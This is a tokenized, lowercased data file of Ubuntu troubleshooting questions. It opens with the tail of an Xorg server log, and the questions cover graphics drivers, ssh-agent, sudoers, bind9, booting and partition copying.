/dev/input/event4 ) [ 613.765 ] ( ** ) video bus : applying inputclass `` evdev keyboard catchall '' [ 613.765 ] ( ii ) using input driver 'evdev ' for 'video bus' [ 613.765 ] ( ** ) video bus : always reports core events [ 613.765 ] ( ** ) evdev : video bus : device : `` /dev/input/event4 '' [ 613.765 ] ( -- ) evdev : video bus : vendor 0 product 0x6 [ 613.765 ] ( -- ) evdev : video bus : found keys [ 613.765 ] ( ii ) evdev : video bus : configuring as keyboard [ 613.765 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/device:02/lnxvideo:00/input/input4/event4 '' [ 613.765 ] ( ii ) xinput : adding extended input device `` video bus '' ( type : keyboard , id 8 ) [ 613.765 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 613.765 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 613.765 ] ( ** ) option `` xkb_layout '' `` us '' [ 613.765 ] ( ** ) option `` xkb_variant '' `` intl '' [ 613.765 ] ( ii ) config/udev : adding input device lid switch ( /dev/input/event0 ) [ 613.765 ] ( ii ) no input driver specified , ignoring this device . [ 613.765 ] ( ii ) this device may have been added with another device file . [ 613.765 ] ( ii ) config/udev : adding input device sleep button ( /dev/input/event1 ) [ 613.765 ] ( ** ) sleep button : applying inputclass `` evdev keyboard catchall '' [ 613.765 ] ( ii ) using input driver 'evdev ' for 'sleep button' [ 613.765 ] ( ** ) sleep button : always reports core events [ 613.765 ] ( ** ) evdev : sleep button : device : `` /dev/input/event1 '' [ 613.765 ] ( -- ) evdev : sleep button : vendor 0 product 0x3 [ 613.765 ] ( -- ) evdev : sleep button : found keys [ 613.765 ] ( ii ) evdev : sleep button : configuring as keyboard [ 613.765 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0c0e:00/input/input1/event1 '' [ 613.765 ] ( ii ) xinput : adding extended input device `` sleep button '' ( type : keyboard , id 9 ) [ 613.765 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 613.765 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 613.765 ] ( ** ) option `` xkb_layout '' `` us '' [ 613.765 ] ( ** ) option `` xkb_variant '' `` intl '' [ 613.766 ] ( ii ) config/udev : adding input device asus usb2.0 webcam ( /dev/input/event10 ) [ 613.766 ] ( ** ) asus usb2.0 webcam : applying inputclass `` evdev keyboard catchall '' [ 613.766 ] ( ii ) using input driver 'evdev ' for 'asus usb2.0 webcam' [ 613.766 ] ( ** ) asus usb2.0 webcam : always reports core events [ 613.766 ] ( ** ) evdev : asus usb2.0 webcam : device : `` /dev/input/event10 '' [ 613.766 ] ( -- ) evdev : asus usb2.0 webcam : vendor 0x1bcf product 0x2883 [ 613.766 ] ( -- ) evdev : asus usb2.0 webcam : found keys [ 613.766 ] ( ii ) evdev : asus usb2.0 webcam : configuring as keyboard [ 613.766 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.3/1-1.3:1.0/input/input10/event10 '' [ 613.766 ] ( ii ) xinput : adding extended input device `` asus usb2.0 webcam '' ( type : keyboard , id 10 ) [ 613.766 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 613.766 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 613.766 ] ( ** ) option `` xkb_layout '' `` us '' [ 613.766 ] ( ** ) option `` xkb_variant '' `` intl '' [ 613.766 ] ( ii ) config/udev : adding input device hda intel pch mic ( /dev/input/event7 ) [ 613.766 ] ( ii ) no input driver specified , ignoring this device . [ 613.766 ] ( ii ) this device may have been added with another device file . [ 613.766 ] ( ii ) config/udev : adding input device hda intel pch headphone ( /dev/input/event8 ) [ 613.766 ] ( ii ) no input driver specified , ignoring this device . [ 613.766 ] ( ii ) this device may have been added with another device file . [ 613.766 ] ( ii ) config/udev : adding input device asus wmi hotkeys ( /dev/input/event6 ) [ 613.766 ] ( ** ) asus wmi hotkeys : applying inputclass `` evdev keyboard catchall '' [ 613.766 ] ( ii ) using input driver 'evdev ' for 'asus wmi hotkeys' [ 613.766 ] ( ** ) asus wmi hotkeys : always reports core events [ 613.766 ] ( ** ) evdev : asus wmi hotkeys : device : `` /dev/input/event6 '' [ 613.766 ] ( -- ) evdev : asus wmi hotkeys : vendor 0 product 0 [ 613.766 ] ( -- ) evdev : asus wmi hotkeys : found keys [ 613.766 ] ( ii ) evdev : asus wmi hotkeys : configuring as keyboard [ 613.766 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/asus-nb-wmi/input/input6/event6 '' [ 613.766 ] ( ii ) xinput : adding extended input device `` asus wmi hotkeys '' ( type : keyboard , id 11 ) [ 613.766 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 613.766 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 613.766 ] ( ** ) option `` xkb_layout '' `` us '' [ 613.766 ] ( ** ) option `` xkb_variant '' `` intl '' [ 613.767 ] ( ii ) config/udev : adding input device at translated set 2 keyboard ( /dev/input/event3 ) [ 613.767 ] ( ** ) at translated set 2 keyboard : applying inputclass `` evdev keyboard catchall '' [ 613.767 ] ( ii ) using input driver 'evdev ' for 'at translated set 2 keyboard' [ 613.767 ] ( ** ) at translated set 2 keyboard : always reports core events [ 613.767 ] ( ** ) evdev : at translated set 2 keyboard : device : `` /dev/input/event3 '' [ 613.767 ] ( -- ) evdev : at translated set 2 keyboard : vendor 0x1 product 0x1 [ 613.767 ] ( -- ) evdev : at translated set 2 keyboard : found keys [ 613.767 ] ( ii ) evdev : at translated set 2 keyboard : configuring as keyboard [ 613.767 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio0/input/input3/event3 '' [ 613.767 ] ( ii ) xinput : adding extended input device `` at translated set 2 keyboard '' ( type : keyboard , id 12 ) [ 613.767 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 613.767 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 613.767 ] ( ** ) option `` xkb_layout '' `` us '' [ 613.767 ] ( ** ) option `` xkb_variant '' `` intl '' [ 613.767 ] ( ii ) config/udev : adding input device etps/2 elantech touchpad ( /dev/input/event9 ) [ 613.767 ] ( ** ) etps/2 elantech touchpad : applying inputclass `` evdev touchpad catchall '' [ 613.767 ] ( ** ) etps/2 elantech touchpad : applying inputclass `` touchpad catchall '' [ 613.767 ] ( ** ) etps/2 elantech touchpad : applying inputclass `` default clickpad buttons '' [ 613.767 ] ( ii ) loadmodule : `` synaptics '' [ 613.767 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 613.767 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 613.767 ] compiled for 1.12.3 , module version = 1.6.99 [ 613.767 ] module class : x.org xinput driver [ 613.767 ] abi class : x.org xinput driver , version 16.0 [ 613.767 ] ( ii ) using input driver 'synaptics ' for 'etps/2 elantech touchpad' [ 613.767 ] ( ** ) etps/2 elantech touchpad : always reports core events [ 613.767 ] ( ** ) option `` device '' `` /dev/input/event9 '' [ 613.768 ] ( ii ) synaptics : etps/2 elantech touchpad : found clickpad property [ 613.768 ] ( -- ) synaptics : etps/2 elantech touchpad : x-axis range 0 - 3420 [ 613.768 ] ( -- ) synaptics : etps/2 elantech touchpad : y-axis range 0 - 2052 [ 613.768 ] ( -- ) synaptics : etps/2 elantech touchpad : pressure range 0 - 255 [ 613.768 ] ( -- ) synaptics : etps/2 elantech touchpad : finger width range 0 - 15 [ 613.768 ] ( -- ) synaptics : etps/2 elantech touchpad : buttons : left double triple [ 613.768 ] ( -- ) synaptics : etps/2 elantech touchpad : vendor 0x2 product 0xe [ 613.768 ] ( ** ) option `` tapbutton1 '' `` 1 '' [ 613.768 ] ( ** ) option `` tapbutton2 '' `` 2 '' [ 613.768 ] ( ** ) option `` tapbutton3 '' `` 3 '' [ 613.768 ] ( ** ) option `` softbuttonareas '' `` 50 % 0 82 % 0 0 0 0 0 '' [ 613.768 ] ( -- ) synaptics : etps/2 elantech touchpad : touchpad found [ 613.768 ] ( ** ) etps/2 elantech touchpad : always reports core events [ 613.768 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio4/input/input9/event9 '' [ 613.768 ] ( ii ) xinput : adding extended input device `` etps/2 elantech touchpad '' ( type : touchpad , id 13 ) [ 613.768 ] ( ** ) synaptics : etps/2 elantech touchpad : ( accel ) minspeed is now constant deceleration 2.5 [ 613.768 ] ( ** ) synaptics : etps/2 elantech touchpad : ( accel ) maxspeed is now 1.75 [ 613.768 ] ( ** ) synaptics : etps/2 elantech touchpad : ( accel ) accelfactor is now 0.050 [ 613.768 ] ( ** ) etps/2 elantech touchpad : ( accel ) keeping acceleration scheme 1 [ 613.768 ] ( ** ) etps/2 elantech touchpad : ( accel ) acceleration profile 1 [ 613.768 ] ( ** ) etps/2 elantech touchpad : ( accel ) acceleration factor : 2.000 [ 613.768 ] ( ** ) etps/2 elantech touchpad : ( accel ) acceleration threshold : 4 [ 613.768 ] ( -- ) synaptics : etps/2 elantech touchpad : touchpad found [ 613.768 ] ( ii ) config/udev : adding input device etps/2 elantech touchpad ( /dev/input/mouse0 ) [ 613.768 ] ( ** ) etps/2 elantech touchpad : ignoring device from inputclass `` touchpad ignore duplicates '' [ 613.971 ] ( ii ) intel ( 0 ) : edid vendor `` cmo '' , prod id 5920 [ 613.971 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 613.971 ] ( ii ) intel ( 0 ) : modeline `` 1920x1080 '' x0.0 140.49 1920 1972 2007 2094 1080 1083 1089 1118 +hsync -vsync ( 67.1 khz ep ) [ 613.971 ] ( ii ) intel ( 0 ) : modeline `` 1920x1080 '' x0.0 92.45 1920 1968 2000 2080 1080 1083 1088 1111 +hsync -vsync ( 44.4 khz e ) [ 800.912 ] ( ii ) xkb : generating xkmfile /tmp/server-66ee0154f48aca3b8b41e2dabcbeb27cfffed199.xkm [ 2376.191 ] ( ii ) intel ( 0 ) : switch to mode 1920x1080 @ 60.0 on lvds1 using pipe 0 , position ( 0 , 0 ) , rotation normal , reflection none [ 2376.566 ] ( ii ) pm event received : capability changed [ 2376.566 ] ( ii ) intel ( 0 ) : switch to mode 1920x1080 @ 60.0 on lvds1 using pipe 0 , position ( 0 , 0 ) , rotation normal , reflection none [ 2378.696 ] ( ii ) aiglx : suspending aiglx clients for vt switch [ 2383.590 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 2383.590 ] ( ii ) aiglx : resuming aiglx clients after vt switch [ 2383.590 ] ( ii ) intel ( 0 ) : switch to mode 1920x1080 @ 60.0 on lvds1 using pipe 0 , position ( 0 , 0 ) , rotation normal , reflection none [ 2383.629 ] ( -- ) synaptics : etps/2 elantech touchpad : touchpad found [ 3287.521 ] ( ii ) intel ( 0 ) : switch to mode 1920x1080 @ 60.0 on lvds1 using pipe 0 , position ( 0 , 0 ) , rotation normal , reflection none [ 3287.881 ] ( ii ) pm event received : capability changed [ 3287.881 ] ( ii ) intel ( 0 ) : switch to mode 1920x1080 @ 60.0 on lvds1 using pipe 0 , position ( 0 , 0 ) , rotation normal , reflection none [ 3289.708 ] ( ii ) aiglx : suspending aiglx clients for vt switch [ 3294.597 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 3294.597 ] ( ii ) aiglx : resuming aiglx clients after vt switch [ 3294.597 ] ( ii ) intel ( 0 ) : switch to mode 1920x1080 @ 60.0 on lvds1 using pipe 0 , position ( 0 , 0 ) , rotation normal , reflection none [ 3294.645 ] ( -- ) synaptics : etps/2 elantech touchpad : touchpad found [ 3304.812 ] ( ii ) unloadmodule : `` synaptics '' [ 3304.812 ] ( ii ) evdev : at translated set 2 keyboard : close [ 3304.813 ] ( ii ) unloadmodule : `` evdev '' [ 3304.813 ] ( ii ) evdev : asus wmi hotkeys : close [ 3304.813 ] ( ii ) unloadmodule : `` evdev '' [ 3304.813 ] ( ii ) evdev : asus usb2.0 webcam : close [ 3304.813 ] ( ii ) unloadmodule : `` evdev '' [ 3304.813 ] ( ii ) evdev : sleep button : close [ 3304.813 ] ( ii ) unloadmodule : `` evdev '' [ 3304.813 ] ( ii ) evdev : video bus : close [ 3304.813 ] ( ii ) unloadmodule : `` evdev '' [ 3304.813 ] ( ii ) evdev : video bus : close [ 3304.813 ] ( ii ) unloadmodule : `` evdev '' [ 3304.813 ] ( ii ) evdev : power button : close [ 3304.813 ] ( ii ) unloadmodule : `` evdev '' [ 3304.864 ] ddxsiggiveup : closing log [ 3304.864 ] server terminated successfully ( 0 ) . closing log file . update : gdm works , opened terminal and entered command sudo dpkg-reconfigure gdm and rebooted . xorg started as well as unity , but i want the unity gui . until i find a way to do that i will stick with this .
410581	applications close immediately when running with optirun	when i try to run for example optirun glxgears the glxgears window opens and closes immediately . it 's the same for any other 3d-accelerated application . optirun firefox or optirun nautilus work though . strangely , everything was running fine until today . i did n't change anything , it just stopped working . i 'm running ubuntu 13.10 with linux-kernel 3.13.0 on an msi-ge40 notebook with an nvidia gtx 760m graphics card with the `` nvidia-331 '' driver and an intel core i7-4702mq .
410582	ubuntu server 12.04 php5enmod	for the life of me i can not figure out why php5enmod can not be found in 12.04 . i can not use it to install php modules like mcrypt . any suggestions ?
410586	how to set up ssh-agent	i have set up ssh-agent . the problem is , it stills asks for a pass-phrase every time ! how do i set it up to only ask for a pass-phrase once ? it would be best if it only asked when it was first needed , but if it asks on login , that is okay too .
410587	can not execute script with sudo no password	i would like to create a batch file that will connect via ssh to my ubuntu server and run a script . my batch file works by using plink , i can see that the call to my script is ran but then i 'm asked for a password for sudo . the script i wrote forces a dlna service to reload its library . only one line in the script file sudo service minidlna force-reload when i run the script and supply the password it produces the expected results . i 've placed the script in /usr/local/bin and can call it directly by name : reload_minidlna.sh . ( i do n't think i need the .sh but i 've been playing with this for days now . ) i edited the sudoers file as follows to allow all users to execute this script without password : all all=nopasswd : /usr/local/bin/reload_minidlna.sh there are two lines under this line : # see sudoers ( 5 ) for more information on `` # include '' directives : and # includedir /etc/sudoers.d this does n't work however . i am always asked for the password either directly logged into the server or via batch file ssh to server . am i missing something here ?
410588	how to find multibit installation path ?	i am specifically looking for how to start multibit from the command line ( it is a java program ) when you click on the unity search button and then launch an application from there , how do you find the location it is running from ? i.e . i want to start an application from terminal but have no idea how to find the command to run it . ( i have tried doing a sudo find / -name 'programname ' but ca n't find it from there either ) ! the program i am looking for i just realised was installed from a java executable so may be somewhere else ?
410590	how do i setup bind9 and virtualbox so that my local machine can access my domain names ?	i have a complicated setup . and it makes me a bit confused about how i should setup my server , bind9 , and my mac os x . so here it is . i have a mac that is connected to the internet via wifi . i have ubuntu installed on my external hard drive that is connected via usb to my macbook . i am able to run it via virtualbox . i control it via ssh in my terminal . so i am running ubuntu server v.13 ( 64bit ) . on my ubuntu server i have nginx running , and bind9 . when i access the ip via the browser everything works and i connect to my server . i even tried ping and everything is ok . here is what i have tried in the bind9 configs : named.conf.local : // // do any local configuration here // // consider adding the 1918 zones here , if they are not used in your // organization //include `` /etc/bind/zones.rfc1918 '' ; zone `` exemple.com.jn '' { type master ; file `` /etc/bind/db.exemple.com.jn '' ; } ; zone `` 1.168.192.in-addr.arpa '' { type master ; file `` /etc/bind/db.192 '' ; } ; i added this file : db.exemple.com.jn ; ; bind data file for example.com ; $ ttl 604800 @ in soa exemple.com.jn . root.exemple.com.jn . ( 1 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl in a 192.168.1.111 ; @ in ns ns.exemple.com.jn . @ in a 192.168.1.111 @ in aaaa : :1 ns in a 192.168.1.111 db.192 ; ; bind reverse data file for local loopback interface ; $ ttl 604800 @ in soa ns.exemple.com.jn . root.exemple.com . ( 2 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl ; @ in ns ns . 1.0.0 in ptr ns.exemple.com.jn . here is the error i got : oops ! google chrome could not find when i ping i get this : ping : unknown host i tried to follow the instructions from : https : //help.ubuntu.com/lts/serverguide/dns-configuration.html i imagine they are other things i need to modify , but i am unsure what they are . also do i need to to modify something on my mac so that it can connect or see the dns server on my ubuntu server so that i can eccess exemple.com.jn .
410591	ctrl c - is n't working	ca n't for the life of me figure out how to get ctrl-c to work . there are other programs i ca n't exit out of , but the one that bothers me the most tail -f filename . so what i tried to do to get out of this , i have tried ctrl c , ctrl z , ctrl d , ctrl \ , ctrl-shift c , ctrl g stty -a looks like this : speed 38400 baud ; rows 22 ; columns 80 ; line = 0 ; intr = ^c ; quit = ^\ ; erase = ^ ? ; kill = ^u ; eof = ^d ; eol = m-^ ? ; eol2 = m-^ ? ; swtch = m-^ ? ; start = ^q ; stop = ^s ; susp = ^z ; rprnt = ^r ; werase = ^w ; lnext = ^v ; flush = ^o ; min = 1 ; time = 0 ; -parenb -parodd cs8 hupcl -cstopb cread -clocal -crtscts -ignbrk brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc ixany imaxbel iutf8 opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke i have tried changing the assignment of intr to a different key , but that did n't work either . from my understanding , it is the job of the shell to transmit the intr to the program that is running .
410595	bsnl 3g modem not connecting	i am having bsnl 3g data card mf 180 and ubuntu 12.04 but can not connect to internet . data card showing as cd drive in left side toolbar .
410596	no usb devices picked up on restart to windows 7 from ubuntu	i have dual boot windows 7 and ubuntu 13.10 on efi dell inspiron 14z 5423 ultrabook . my devices are recognized well in ubuntu . if i reboot the system ( i , e switch from ubuntu to windows 7 ) and start windows 7 , no usb devices are recognized in windows 7 . but when i shutdown ubuntu completely and then start the system with windows 7 , all usb devices are recognized well . sometimes even shutting down ubuntu and restarting to windows 7 has this problem , and then i have to hold down poweroff button and shut it down or usb devices will not get picked up . i am sure it is because of ubuntu as i have tested it by removing ubuntu . ( 4 times ) also i have laptop-mode-tools and usb autosuspend is on . ( have also tried to disable autosuspend but no success ) i have disabled integrated nic because when it is enabled ubuntu wo n't boot ( purple screen ) . also i have intel rapid storage setup in windows 7 , have disabled it but it did n't help . please if any one can help . update thanks to suggestion of @ falconer , my issue is resolved now . windows 7 drivers were giving me this problem . i downloaded usb 3.0 drivers from dell website but they gave errors of newer drivers are already installed . then i downloaded drivers from intel website they too gave the particular error but i was able to force install and now after testing my problem is resolved . so this problem arises when you do n't have proper windows usb 3.0 drivers and you try to attach usb 2.0 device in usb 3.0 port in linux . these are lsusb and lspci outputs if it can help :
410600	adding a google docs link to my desktop	how can i add a google docs link with a google docs icon to my desktop ?
410604	installing nvidia drivers with pkg1.run ends with `` no version.h found ''	i have read a lot and tried a lot - nothing worked for me . i have a dell inspiron 8200 ( 1600x1200 ) with a geforce mx440 mobile . installing the driver the `` easy way '' ( sudo apt-get install nvidia-current ) leaves me stuck with a tiny non-changeable resolution ( 1024x768 or 800x600 ) . so i went for the hard way : sudo apt-get update sudo apt-get dist-upgrade blacklisted the nouveau-driver rebooted downloaded and run ( sudo sh ... ) the nvidia 96 file ending pkg1.run which is the right one for me as i read somewhere . this lead to an error : error : the kernel header file '/lib/modules/3.08.0-35-generic/build/include/linux/version.h ' does not exist . the most likely reason for this is that the kernel source files in '/lib/modules/3.08.0-35-generic/build ' have not been configured . how can i configure the kernel source files ? there is nothing like sudo make-prepare or sudo get-apt kernel-devel right ? a workaround suggested to copy the version.h ( cp -v /usr/include/linux/version.h /lib/modules/ $ ( uname -r ) /build/include/linux ) which lead to this error : error : if you are using a linux 2.4 kernel , please make sure you either have configured kernel sources matching your kernel or the correct set of kernel headers installed on your system . if you are using a linux 2.6 kernel , please make sure you have configured kernel sources matching your kernel installed on your system . if you specified a separate output directory using either the '' kbuild_output '' or the `` o '' kbuild parameter , make sure to specify this directory with the sysout environment variable or with the equivalent nvidia-installer command line option . depending on where and how the kernel sources ( or the kernel headers ) were installed , you may need to specify their location with the syssrc environment variable or the equivalent nvidia-installer command line option . where are the kernel sources installed ? i even tried to run the ... pkg1.run with -- kernel-source-path /usr/include/linux ( where version.h and many other .h files are ) as parameter but this lead to : error : the kernel header file '/usr/include/linux/include/linux/kernel.h ' does not exist ( ... ) has anybody an idea ?
410608	lubuntu suddenly black screen after login	so having lubuntu on laptop . the laptop screen is broken ( flickering and such ) so usually using a the tv or a monitor connected to the laptop to do stuff . now for some reason when starting it goes to the login screen ( you can see white/blue-ish flicker on the laptop screen , but for some reason the tv screen stays black ) . when i type the password and i hit enter the flicker goes away , instead the screen goes black ( and still no signal on tv ) . also getting a few weird audio `` noise clicks '' . when i press the power button the `` shutdown '' screen appears instead of blackness ( still no signal on tv ) and then it turns off . the fn+f4 i used to switch between display setups doesnt seem to react and from googling i tried to go into ctrl+alt+f1 ; logged in and tried xrandr , which just says `` ca n't open display '' though . i have dualboot with windows xp still installed , and there fn+f4 seems to still work . also i dont get the weird audio-noise clicks on windowsxp or the bootup or such , only in lubuntu . not sure if they 're even relevant but wanted to mention them .
410610	is there a hotkey that will force the autohide slider to appear ?	auto hide slider does not stay pinned to the colored slider bar on large archives . i would like to locate the autohide slider with a hotkey and avoid trying to locate the slider by moving the mouse around .
410611	interapp control for ubuntu	there are a program called interapp control that blocked websites , like facebook.com , youtube , and others . the site is here but there are a similar program for ubuntu ?
410613	what is the meaning of bash	i have been using ubuntu for a short period of time.i have seen this term bash in many places including a terminal . i have still not understood what it is . can somebody please explain clearly .
410616	laptop is using main gpu processor its use a lot bottery	im new in ubuntu , my laptop like many others , have 2 gpu processors , one intel and another one is nvidia , in windows intel gpu used for most of work except games , so battery usage was low but in ubuntu it seems it use main graphic for os , my laptop temperature is hi and also battery will work only for 1 hour how i can change this setting in ubuntu additional info : also i cant update my graphic driver , when i have updated it , after login only black screen is on screen
410618	how te reinstall unity ?	i have a problem . i deleted some gnome packages , and now ubuntu wo n't work as it should . plus i installed some programs for system tweak ( new look of icons etc ) and delete them and only left ubuntu tweak . i log in system and i cross with mouse over icons in slide-bar and name of icons stays but wo n't go away ... and desktop picture wo n't show up ... but 2d ubuntu work ok but my desktop wo n't responding to left and right mouse clicks ( marking , meny ) ... ! and i can not see desktop icons but when i go in nautilus and go to home/desktop i see desktop icons ! ? i clean unnecessary programs and they left of with ubuntu tweak and now unity work but and i can change desktop background picture but still can not use desktop shortcuts on desktop . i always check out manually for updates but it is still the same . how to reinstall unity to the latest version without reinstallation of complete ubuntu .txk . more you can find here : http : //ubuntuforums.org/showthread.php ? t=2200383 # post12904241
410619	unable to install nvidia-settings	i am trying to install nvidia-settings on ubuntu 12.04 . this is a fresh install done today ( jan 25 , 2014 ) . i have nvidia-331 installed ( i believe it 's 331.38 , but do n't think the exact version matters here ) . johngu @ guru-laptop : ~/downloads $ sudo apt-get install nvidia-settings reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nvidia-settings : depends : screen-resolution-extra ( > = 0.14ubuntu2.1 ) but 0.14ubuntu2 is to be installed e : unable to correct problems , you have held broken packages . johngu @ guru-laptop : ~/downloads $ sudo apt-get install screen-resolution-extra reading package lists ... done building dependency tree reading state information ... done screen-resolution-extra is already the newest version . the following packages were automatically installed and are no longer required : gir1.2-ubuntuoneui-3.0 libubuntuoneui-3.0-1 thunderbird-globalmenu use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . any help here would be appreciated . i just want to have access to the nvidia control panel .
410620	my dell demension 5150 with msw xp pro ntldr is missing restart after access with ubuntu	my windows xp pro system is inaccessible after mounting with ubuntu 11.04 but did not install or do anything to disk . installed another 500 gb scsi disk to install ubuntu and it works but i have to disconnect the windows disk and use the ubuntu cd to connect to the 500 gb disk . is there a way i can access the ubuntu disk without the cd and with the windows disk connected ? the windows disk does have files on it , when i try ubuntu on it i can access them . windows restore gets me to a c : \ prompt and has no directory of accessible files . when i start system with both hard disks connected it does not recognized the ubuntu disk . how can i set the ubuntu hard disk to the start up menu or the power button with windows disk connected ? any help would be appreciated . thanks
410626	how to add a programme item to the dash in ubuntu 13.10 ?	i 've been trying to add an item for eclipse in alacarte without success . several users suggested adding a file named eclipse.desktop to /usr/share/applications , similar to what has been suggested for ubuntu 12.04 , but it does n't have any effect . update : i have finally managed to get eclipse showing up in the dash , but only for my user . apparently .desktop files created in /usr/share/applications are being ignored , why ? apart from that it seems that alacarte is largely useless in 13.10 .
410629	ubuntu 13.10 microsoft sculpt comfort bluetooth mouse issue	first of all , everything works normally on the same computer with windows 8.1 . if i connect the mouse to ubuntu 13.10 manually ( pressing special button on the device ) , it enables and works properly . but after reboot it does n't connect automatically and i have to do it by pressing the button . so , it seems i need to provide some feedback between the mouse and ubuntu , but how should i do this ?
410631	how do i boot into ubuntu instead of windows ?	i 've just finished install ubuntu 12.04 onto an additional partition on my single hard-drive . i 'm also running windows 8 . during the install i created an ext4 partition , a swap partition , and a boot partition as instructed by the ubuntu installer . the install completed successfully ... but after rebooting it takes me straight into windows 8 . i tried searching for a similar issue - and found this ( how to load ubuntu with windows 8 boot loader ) so i followed those steps , installed easybcd 2.2 and tried my best to add ubuntu . now when i boot i get a menu that says 'ubuntu 1 , ubuntu 2 , ubuntu 3 , windows 8.1 ' - each added slightly differently - but fail to boot . windows 8.1 still works though . i tried using the boot-repair using instructions found here ( how to install the boot-repair tool in an ubuntu live disc ? ) and i copied/pasted the commands as instructed ... .but after rebooting i 'm taken to the boot menu that appeared after running easybcd . can anyone tell me what i can do to boot into ubuntu without losing my windows partition ? here is the output the boot-repair tool has generated : http : //paste.ubuntu.com/6815414/ i 've tried using the boot-repair too a few times now . when it begins it says 'efi detected . please check the options ' . the advanced options are : main options reinstall grub use the standard efi file unhide boot menu grub location os to boot by default sda5 ( checked ) seperate /boot/efi partition sda1 grub options ( checked ) secureboot mbr options greyed other options repair windows boot files create bootinfo summary participate to statistics of use check internet connection when i click apply it says : 'the boot of yoru pc is in legacy mode . you may want to retry after changing it to efi mode . do you want to continue ? ' no exits . yes will bring up the message : buggy-kernel detected . do you want to activate [ backup and rename windows efi files ] ? ( if any choice fails , please retry with the other ) . no matter what response i choose , when i reboot i see the same boot menu from easy bcd . thanks for reading through all this . i 'm really stuck on this one .
410636	copying the ubuntu partition in an external disk and boot from there	for some reasons to long to be explained i have to copy my linux partition in another hd and then boot ubuntu from there . this if my fdisk -l output disk /dev/sda : 250.1 gb , 250059350016 bytes 255 testine , 63 settori/tracce , 30401 cilindri , totale 488397168 settori unită = settori di 1 * 512 = 512 byte sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes identificativo disco : 0x52f375e9 dispositivo boot start end blocks id system /dev/sda1 2048 3071999 1534976 82 linux swap / solaris /dev/sda2 * 3072000 254730239 125829120 7 hpfs/ntfs/exfat /dev/sda3 254730240 438394879 91832320 7 hpfs/ntfs/exfat /dev/sda4 438396926 488396799 24999937 5 esteso /dev/sda5 438396928 488396799 24999936 83 linux on sda2 there is windows , on sda3 data partition and on sda5 ububntu . from livecd i created an image of my sda5 partition to a third external disk with : $ sudo dd if=/dev/sda5 of=/path-to-external-disk/ubuntu.img now i want to put this image to another hd in such a way that i can then boot ubuntu from there instead that from the pc hd . i tried with $ sudo dd if=/path-to-external-disk/ubuntu.img of=/dev/sdb1 where sdb1 is the hd . all goes well but i am not able of boot ubuntu from the external hd.. edit : sneetsher suggestions no , before i was not from live cd , now i am and these are the output of the command you ask me output of fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x52f375e9 device boot start end blocks id system /dev/sda1 2048 3071999 1534976 82 linux swap / solaris /dev/sda2 * 3072000 254730239 125829120 7 hpfs/ntfs/exfat /dev/sda3 254730240 438394879 91832320 7 hpfs/ntfs/exfat /dev/sda4 438396926 488396799 24999937 5 extended /dev/sda5 438396928 488396799 24999936 83 linux disk /dev/sdb : 4192 mb , 4192206848 bytes 129 heads , 62 sectors/track , 1023 cylinders , total 8187904 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002cb8f device boot start end blocks id system /dev/sdb1 * 62 8181953 4090946 c w95 fat32 ( lba ) disk /dev/sdc : 82.0 gb , 81964302336 bytes 255 heads , 63 sectors/track , 9964 cylinders , total 160086528 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0008f93b device boot start end blocks id system /dev/sdc1 * 63 160071659 80035798+ 7 hpfs/ntfs/exfat output of df filesystem 1k-blocks used available use % mounted on /cow 1032088 127720 851940 14 % / udev 2056204 4 2056200 1 % /dev tmpfs 825908 888 825020 1 % /run /dev/sdb1 4082952 1771180 2311772 44 % /cdrom /dev/loop0 691456 691456 0 100 % /rofs tmpfs 2064768 24 2064744 1 % /tmp none 5120 4 5116 1 % /run/lock none 2064768 176 2064592 1 % /run/shm the problem is that i ca n't mount the disk , when i try i get the following error : mount : wrong fs type , bad option , bad superblock on /dev/sdc1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so
